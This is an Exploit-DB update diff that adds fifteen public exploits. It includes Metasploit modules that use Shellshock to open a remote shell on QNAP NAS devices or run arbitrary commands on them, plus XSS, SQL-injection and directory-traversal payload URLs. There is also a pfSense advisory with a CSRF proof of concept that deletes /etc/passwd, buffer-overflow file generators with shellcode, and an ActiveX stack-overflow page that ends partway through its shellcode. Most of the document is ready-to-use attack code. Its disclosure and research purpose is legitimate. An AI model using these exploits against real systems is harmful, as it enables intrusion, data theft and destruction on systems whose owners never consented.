DB: 2015-03-27

15 new exploits

files.csv

@@ -32909,3 +32909,18 @@ id,file,description,date,author,platform,type,port
 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
 36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
+36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting Vulnerability",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
+36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-01-04,"Mesut Timur",php,webapps,0
+36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting Vulnerability",2012-01-04,"Gjoko Krstic",php,webapps,0
+36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 'status' Parameter SQL Injection Vulnerability",2011-12-29,SiteWatch,php,webapps,0
+36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 'SERVER[php_self]' Cross Site Scripting Vulnerability",2011-12-29,SiteWatch,php,webapps,0
+36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross Site Scripting Vulnerability",2012-01-04,sonyy,php,webapps,0
+36498,platforms/php/webapps/36498.txt,"Yaws 1.88 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0
+36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0
+36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal Vulnerability",2012-01-05,demonalex,windows,remote,0
+36501,platforms/windows/local/36501.py,"Mini-stream Ripper v2.7.7.100 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
+36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
+36503,platforms/hardware/remote/36503.rb,"QNAP admin shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993
+36504,platforms/hardware/remote/36504.rb,"QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0
+36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0
+36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0

platforms/hardware/remote/36503.rb

@@ -0,0 +1,119 @@
+# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
+# Date: 7 February 2015
+# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+# Employer homepage: http://www.securegroup.it
+# Vendor homepage: http://www.qnap.com
+# Version: All Turbo NAS models except TS-100, TS-101, TS-200
+# Tested on: TS-1279U-RP
+# CVE : 2014-6271
+# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
+
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/d3vpp/metasploit-modules
+##
+
+require 'msf/core'
+require 'net/telnet'
+
+class Metasploit3 < Msf::Auxiliary
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+
+   def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
+      'Description' => %q{
+		This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
+		Affected products:
+		All Turbo NAS models except TS-100, TS-101, TS-200
+		},
+      'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+      'License' => MSF_LICENSE,
+      'References' => [
+			['CVE', '2014-6271'], #aka ShellShock
+			['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
+		],
+      'Platform'       => ['unix']
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
+      OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
+    ], self.class)
+  end
+
+ def check
+	begin
+ 	res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'agent' => "() { :;}; echo; /usr/bin/id"
+      })
+	rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+		vprint_error("Connection failed")
+		return Exploit::CheckCode::Unknown
+ end
+	
+    if !res
+      return Exploit::CheckCode::Unknown
+    elsif res.code== 302 and res.body.include? 'uid'
+	  return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+	
+
+  def exploit_telnet()
+    telnetport = datastore['LTELNET']
+
+    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
+
+    print_status("#{rhost}:#{rport} - Sending exploit")
+    begin
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+      if sock
+        print_good("#{rhost}:#{rport} - Backdoor service spawned")
+        add_socket(sock)
+      else
+        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
+      end
+
+      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
+      merge_me = {
+        'USERPASS_FILE' => nil,
+        'USER_FILE'     => nil,
+        'PASS_FILE'     => nil,
+        'USERNAME'      => nil,
+        'PASSWORD'      => nil
+      }
+      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+    rescue
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
+    end
+    return
+  end
+
+  def run
+	begin
+	telnetport = datastore['LTELNET']
+	res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
+      })		    
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+           Rex::HostUnreachable => e
+      fail_with(Failure::Unreachable, e)
+    ensure
+      disconnect
+    end
+	exploit_telnet()
+    
+  end
+	
+end

platforms/hardware/remote/36504.rb

@@ -0,0 +1,85 @@
+# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
+# Date: 7 February 2015
+# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+# Employer homepage: http://www.securegroup.it
+# Vendor homepage: http://www.qnap.com
+# Version: All Turbo NAS models except TS-100, TS-101, TS-200
+# Tested on: TS-1279U-RP
+# CVE : 2014-6271
+# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
+
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/d3vpp/metasploit-modules
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+   def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
+      'Description' => %q{
+		This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
+		Affected products:
+		All Turbo NAS models except TS-100, TS-101, TS-200
+		},
+      'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
+      'License' => MSF_LICENSE,
+      'References' => [
+			['CVE', '2014-6271'], #aka ShellShock
+			['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
+		],
+      'Platform'       => ['unix']
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
+      OptString.new('CMD', [ true, 'The command to run', '/bin/cat  /etc/passwd'])
+    ], self.class)
+  end
+
+ def check
+	begin
+ 	res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'agent' => "() { :;}; echo; /usr/bin/id"
+      })
+	rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+		vprint_error("Connection failed")
+		return Exploit::CheckCode::Unknown
+ end
+	
+    if !res
+      return Exploit::CheckCode::Unknown
+    elsif res.code== 302 and res.body.include? 'uid'
+	  return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+	
+
+  def run
+
+	res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'agent' => "() { :;}; echo; #{datastore['CMD']}"
+      })
+	
+	if res.body.empty?
+		print_error("No data found.")
+	elsif res.code== 302
+		print_status("#{rhost}:#{rport} - bash env variable injected")
+		puts " "
+		print_line(res.body)
+    end
+	end
+	
+end

platforms/php/webapps/36492.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51258/info
+
+GraphicsClone Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/search/?term=<script>alert(document.cookie)</script>

platforms/php/webapps/36493.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51260/info
+
+Orchard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+Orchard 1.3.9 is vulnerable; other versions may be affected. 
+
+http://www.example.com/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fwww.netsparker.com%3f 

platforms/php/webapps/36494.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51261/info
+
+Limny is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Limny 3.0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/admin/login.php/"/><script>alert(&#039;zsl&#039;)</script>

platforms/php/webapps/36495.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51273/info
+
+Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Pligg CMS 1.1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0 

platforms/php/webapps/36496.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51274/info
+
+Pligg CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Pligg CMS 1.1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/demo/search/')%7B%7Dalert('xss');if(' 

platforms/php/webapps/36497.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/51275/info
+
+UBB.threads is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+UBB.threads 7.5.6 is vulnerable; other versions may also be affected. 
+
+The following exploit data is available:
+
+http://www.example.com/forums/ubbthreads.php/ubb/login/lostpw/1
+
+POST /forums/ubbthreads.php
+ubb=start_page&Loginname=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&Email=&buttforgot=I+forgot+my+password
+

platforms/php/webapps/36498.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/51276/info
+
+Yaws is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.
+
+Yaws 1.88 is vulnerable; other versions may be affected. 
+
+http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
+http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
+http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
+http://www.example.com/editPage.yaws?node=home 

platforms/php/webapps/36499.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/51280/info
+
+StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+StatIt 4 is vulnerable; other versions may be affected. 
+
+The following example URIs are available:
+
+http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&enc=333263120212292&agent=ari/534.30&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace
+
+http://www.example.com/statit4/statistik.php?action=stat_tld&st_id=1&show=more%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E\&PHPSESSID=d8679fc904017bdf6b09f5d88f7cf979
+
+http://www.example.com/statit4/statistik.php?action=stat_abfragen&st_id=1&show=more&order=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&sort=1&PHPSESSID=698bf9d1e988e3af70022f1dfb86fd33
+

platforms/php/webapps/36506.txt

@@ -0,0 +1,105 @@
+Advisory ID: HTB23251
+Product: pfSense
+Vendor: Electric Sheep Fencing LLC 
+Vulnerable Version(s): 2.2 and probably prior
+Tested Version: 2.2
+Advisory Publication:  March 4, 2015  [without technical details]
+Vendor Notification: March 4, 2015 
+Vendor Patch: March 5, 2015 
+Public Disclosure: March 25, 2015 
+Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
+CVE References: CVE-2015-2294, CVE-2015-2295
+Risk Level: Medium 
+CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks.
+
+Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administrator’s cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface.
+
+
+1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294
+
+1.1 Input passed via the "zone" HTTP GET parameter to "/status_captiveportal.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to "/firewall_rules.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+Below are two PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.3 Input passed via the "queue" HTTP GET parameter to "/firewall_shaper.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.4 Input passed via the "id" HTTP GET parameter to "/services_unbound_acls.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", "filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", "filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to "/diag_logs_filter.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+Below are eight PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
+
+
+2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295
+
+2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in "/system_firmware_restorefullbackup.php" script. A remote attacker can trick a log-in administrator to visit a malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges.
+
+The following PoC code deletes file "/etc/passwd":
+
+https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to pfSense 2.2.1
+
+More Information:
+https://blog.pfsense.org/?p=1661
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and multiple XSS vulnerabilities in pfSense.
+[2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

platforms/windows/local/36501.py

@@ -0,0 +1,34 @@
+#!/usr/bin/env python
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow
+#[+] Date: 25-03-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Original POC:
+#    http://www.exploit-db.com/exploits/11197/
+#POC:
+#IMG1:
+#http://i.imgur.com/ifXYgwx.png
+#IMG2:
+#http://i.imgur.com/ZMisj6R.png
+from struct import pack
+file="crack.m3u"
+junk="\x41"*35032
+eip=pack('<I',0x7C9D30D7)
+junk2="\x44"*4
+#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
+#http://www.exploit-db.com/exploits/28996/
+shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
+           "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
+           "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
+         "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
+           "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
+           "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
+          "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
+           "\x49\x0b\x31\xc0\x51\x50\xff\xd7")
+writeFile = open (file, "w")
+writeFile.write(junk+eip+junk2+shellcode)
+writeFile.close()

platforms/windows/local/36502.py

@@ -0,0 +1,32 @@
+#!/usr/bin/env python
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
+#[+] Date: 25-03-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Related Vulnerability/ies:
+#    http://www.exploit-db.com/exploits/8628/
+#POC:
+#IMG1:
+#http://i.imgur.com/87sXIj8.png
+from struct import pack
+file="crack.ram"
+junk="\x41"*35032
+eip=pack('<I',0x7C9D30D7)
+junk2="\x44"*4
+#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
+#http://www.exploit-db.com/exploits/28996/
+shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
+           "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
+           "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
+         "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
+           "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
+           "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
+          "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
+           "\x49\x0b\x31\xc0\x51\x50\xff\xd7")
+writeFile = open (file, "w")
+writeFile.write(junk+eip+junk2+shellcode)
+writeFile.close()

platforms/windows/remote/36500.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/51286/info
+
+HServer web server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
+
+Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.
+
+HServer 0.1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/..%5c..%5c..%5cboot.ini
+http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
+http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
+http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts 

platforms/windows/remote/36505.txt

@@ -0,0 +1,88 @@
+<html>
+<!--
+# Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day)
+# Date: 26th MArch, 2015
+# Exploit Author: Praveen Darshanam
+# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
+# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
+# Version: 1, 6, 42, 0
+# Tested on: Windows XP SP3 (IE6/7/8)
+# CVE : 2015-2097
+
+targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
+prototype  = "Sub LoadImage ( ByVal bstrFullPath As String )"
+memberName = "LoadImage"
+progid     = "WESPMONITORLib.WESPMonitorCtrl"
+argCount   = 1
+For full analysis of the exploit refer 
+http://blog.disects.com/2015/03/webgate-edvr-manager.html
+-->
+
+<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
+</object>
+<script>
+var arg1 = "";
+nops = "";
+var buff = "";
+
+for(i=0;i<268;i++)
+{
+ arg1 += "B";
+}
+
+nseh = "\xeb\x10\x90\x90";  //jmp over addr
+seh = "\x71\x47\x01\x10";  //pop pop ret addr
+document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
+
+for(i=0;i<200;i++)
+{
+ nops += "\x90";
+}
+
+sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
+"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
+"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
+"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
+"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
